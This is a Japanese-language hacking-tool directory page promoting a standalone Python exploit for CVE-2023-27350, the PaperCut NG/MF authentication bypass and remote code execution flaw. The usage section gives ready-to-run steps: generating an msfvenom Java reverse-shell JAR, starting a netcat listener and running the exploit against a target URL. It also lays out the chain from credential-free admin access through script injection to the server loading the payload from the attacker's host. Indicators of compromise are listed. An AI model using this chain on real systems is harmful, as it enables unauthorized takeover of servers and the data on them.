Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/joaoaugustom/papercut-authentication_bypass_and_rce
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト認証学習と教育リモートアクセスツール

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub
joaoaugustom/papercut-authentication_bypass_and_rce

PaperCut-Authentication_Bypass_and_RCE

このエクスプロイトはCVE-2023-27350に基づいており、horizon3aiによるオリジナルのエクスプロイトとMetasploitモジュールをベースに構築されています。

リポジトリを見る
2ヶ月前未レビュー

CVE-2023-27350 — PaperCut NG/MF 認証バイパス & RCE

PaperCut NG/MF の重大な認証バイパスおよびリモートコード実行の脆弱性に対するスタンドアロン Python エクスプロイト。CVSS 9.8。

説明

CVE-2023-27350 は、20.1.7、21.2.11、22.0.9 より前のバージョンの PaperCut NG および MF に影響します。この欠陥により、認証されていない攻撃者が /app?service=page/SetupCompleted エンドポイント(初期インストール中にのみ到達可能なセットアップページ)にアクセスし、いかなる認証情報もなしに有効な管理者セッションを取得できます。

管理者アクセスを取得すると、攻撃者は PaperCut の印刷スクリプト機構を有効化し、サーバーの JVM によって実行される任意のコードを注入でき、サービスユーザーのコンテキストで完全な RCE につながります。

影響を受けるバージョン

ブランチ修正バージョン
20.x20.1.7
21.x21.2.11
22.x22.0.9

18.x 以前のバージョンには公式パッチは提供されていません。

参考実装

このエクスプロイトは、2つの公開実装の分析から開発されました:

1. horizon3ai/CVE-2023-27350 (Python)

  • リポジトリ: https://github.com/horizon3ai/CVE-2023-27350
  • 手法: プレーンな文字列で Runtime.exec() を使用してコマンドを実行します
  • 制限事項: Runtime.exec(String) はシェルのメタ文字(>&、|、0>&1)を処理しないため、リバースシェルのペイロードが効果を発揮しません。また、このスクリプトはプリンター ID(l1001)をハードコードしており、英語のみの成功文字列をチェックするため、非英語環境では失敗します
  • エンジンの誤った想定: PaperCut が BeanShell ではなく RhinoJS を使用していることを考慮しておらず、特定の Java ペイロードで構文エラーが発生します

2. rapid7/metasploit-framework — PaperCutNG 認証バイパス

  • モジュール: exploit/multi/http/papercut_ng_rce
  • 手法: URLClassLoader を介して Metasploit JAR を JVM にロードし、シェルへの依存を回避します
  • 制限事項: 完全な Metasploit Framework が必要で、Java/Meterpreter ペイロードを生成します。nc を使用したスタンドアロン用途には簡単に適応できません

要件

root@kitploit:~
Python 3.x
requests
msfvenom (part of Metasploit Framework)
nc (netcat)
root@kitploit:~
pip install requests

使用方法

1. JAR ペイロードを生成

root@kitploit:~
msfvenom -p java/shell_reverse_tcp \
  LHOST=<YOUR_IP> LPORT=<SHELL_PORT> \
  -f jar -o payload.jar

2. リスナーを起動

root@kitploit:~
nc -lvnp <SHELL_PORT>

3. エクスプロイトを実行

root@kitploit:~
python exploit.py \
  -u http://<TARGET>:9191 \
  -j payload.jar \
  -lh <YOUR_IP> \
  -lp <HTTP_PORT> \
  -rp <SHELL_PORT>

例:

root@kitploit:~
python exploit.py \
  -u http://192.168.1.100:9191 \
  -j payload.jar \
  -lh 192.168.1.10 \
  -lp 9090 \
  -rp 4444

パラメータ

動作の仕組み

root@kitploit:~
1. Auth bypass via /app?service=page/SetupCompleted
        ↓
2. Obtain admin JSESSIONID without credentials
        ↓
3. Select [Template Printer] (l1001)
        ↓
4. Inject RhinoJS script into the print script field
        ↓
5. Script creates a URLClassLoader pointing to our HTTP server
        ↓
6. PaperCut JVM downloads and executes payload.jar
        ↓
7. Reverse shell

侵害の指標 (IoC)

  • 事前セッションなしでの /app?service=page/SetupCompleted へのアクセス
  • print-and-device.script.enabled および print.script.sandboxed 設定の変更(バージョン >= 19)
  • PaperCut サーバーから外部 IP への送信 HTTP 接続
  • JVM ログにおける外部 URL を使用した URLClassLoader のインスタンス化

法的免責事項

このエクスプロイトは教育目的および許可された用途(ペネトレーションテスト、CTF、ラボ環境)のみで提供されます。明示的な許可なしにシステムに対して使用することは違法です。著者はいかなる誤用についても責任を負いません。

ツールをダウンロード
パラメータ説明デフォルト
-u / --urlPaperCut のベース URL必須
-j / --jarpayload.jar へのパス必須
-lh / --lhostあなたの IP(ターゲットがここに接続し返します)必須
-lp / --lportJAR を配信する HTTP ポート9090
-rp / --rportリバースシェルのポート4444